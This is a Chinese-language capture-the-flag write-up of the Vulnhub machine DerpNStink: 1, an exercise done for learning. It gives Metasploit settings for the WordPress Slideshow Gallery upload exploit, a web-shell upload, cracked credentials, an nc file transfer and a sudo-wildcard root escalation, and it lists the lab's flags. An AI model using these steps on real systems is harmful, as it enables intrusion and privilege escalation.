Vulnhub - DerpNStink: 1

扫描存活主机和端口，发现开放了21、22、80端口

访问80端口如下：

查看源码发现/webnotes/info.txt如下：

@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live

于是我们需要修改/etc/hosts文件

192.168.150.147 derpnstink.local

并在最下面找到flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

接着扫一下目录

发现robots.txt访问如下：

再访问/temporary/如下：

再访问/weblog/可以看到是个wp站点，版本为4.6.9

并且扫到后台目录wp-admin，尝试弱口令admin/admin成功登录

利用wpscan也可以得到账密admin/admin，并且扫描发现wp插件Slideshow Gallery旧版本1.4.6，这个版本存在文件上传漏洞可以利用

于是我们可以搜索一下该渗透模块

searchsploit Slideshow Gallery

直接利用该脚本上传文件

这里传个phpinfo可以发现成功了

再来手工打一下，上传php恶意代码，例如phpinfo

访问即可看到phpinfo页面

接着上传一句话成功连上蚁剑

在/home目录下发现还存在mrderp和stinky用户

还可以利用msf来提权

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS 192.168.150.147
set TARGETURI /weblog
set WP_PASSWORD admin
set WP_USER admin

在/var/www/html/weblog/目录下的wp-config.php文件中找到数据库名wordpress以及账密root/mysql

于是就可以成功登录phpmyadmin

在wp_posts表中得到flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

并在wp_users表中发现还存在用户unclestinky/PBW6NTkFvboVVCHU2R9qmNai1WfHSC41

hashcat爆破发现爆不出来

再换john试试得到密码：wedgie57

登录该账号会发现用户权限更大了，并且直接能看到flag2

并且再尝试一下用该密码登录ftp或者ssh到前面获取的用户，发现stinky用户可以成功登录ftp，而ssh都无法登录

在/files/network-logs/目录下发现了derpissues.txt，是mrderp与stinky两个用户的对话如下：

12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

在/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/目录下发现key.txt，是个ssh的私钥

然后利用key登录ssh，这里出现两个问题：一是权限问题，chmod 600 key.txt即可解决；二是ssh证书失效，在登陆时添加命令-o PubkeyAcceptedKeyTypes=+ssh-rsa即可解决。连上后在桌面文件发现flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

并在Documents目录下发现derpissues.pcap文件，于是通过nc将其下载下来

nc -lvvp 1234 > derpissues.pcap

nc -nv 192.168.150.128 1234 < derpissues.pcap

或者利用scp传输文件

scp -i key.txt stinky@192.168.150.147:/home/stinky/Documents/derpissues.pcap /root/derpissues.pcap

分析流量包，追踪http或者导出http可以发现密码：derpderpderpderpderpderpderp

接着使用该密码成功登录mrderp用户

在桌面发现helpdesk.log文件如下：

从中发现有个自助网页：https://pastebin.com/RzK9WfGw，可以得到如下信息：

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

于是我们先创建一个binaries目录，再将/bin/bash写入derpy.sh文件并赋予最高权限后执行它

mkdir binaries
cd binaries
echo '/bin/bash' >> derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh

提权后在/root/Desktop目录下得到flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

后面发现其实可以直接利用cve-2021-4034来提权